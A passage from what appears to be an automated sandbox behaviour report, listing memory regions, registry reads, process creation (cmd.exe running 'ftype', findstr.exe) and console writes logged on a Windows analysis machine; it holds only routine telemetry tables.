| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00687fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00810fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x01c1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c20000 | 0x01c20000 | 0x01f62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f70000 | 0x01f70000 | 0x0206ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02070000 | 0x0233efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x49e40000 | 0x49e98fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee69d0000 | 0x7fee69d7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | STD_INPUT_HANDLE | - |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xb60, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\findstr.exe | os_pid = 0xb68, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e40000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-06 08:01:16 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 125268 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
2 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
2 |
Process #9: cmd.exe
1296
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /S /D /c" ftYpe " |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:57, Reason: Child Process |
| Unmonitor | End Time: 00:00:59, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb60 |
| Parent PID | 0xb58 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B64
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x00044fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x0058ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00717fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x01caffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001cb0000 | 0x01cb0000 | 0x01ff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002000000 | 0x02000000 | 0x020fffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x49e40000 | 0x49e98fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee69d0000 | 0x7fee69d7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (1003)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
249 | |
| Open | STD_OUTPUT_HANDLE | - |
|
501 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 103 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 100 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 124 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 122 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 126 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 119 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 118 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 98 |
|
7 | |
| Write | STD_OUTPUT_HANDLE | size = 147 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 133 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 127 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 134 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 131 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 149 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 92 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 138 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 105 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 109 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 83 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 104 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 87 |
|
8 | |
| Write | STD_OUTPUT_HANDLE | size = 89 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 86 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 71 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 17 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 125 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 45 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 70 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 76 |
|
8 | |
| Write | STD_OUTPUT_HANDLE | size = 35 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 82 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 68 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 75 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 63 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 67 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 50 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 52 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 53 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 90 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 99 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 81 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 93 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 91 |
|
7 | |
| Write | STD_OUTPUT_HANDLE | size = 84 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 34 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 64 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 47 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 74 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 123 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 66 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 46 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 65 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 48 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 55 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 77 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 113 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 95 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 129 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 94 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 136 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 88 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 97 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 96 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 57 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 177 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 160 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 102 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 110 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 144 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 142 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 141 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 117 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 108 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 26 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 |
Registry (269)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\*\Shell\Open\Command | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
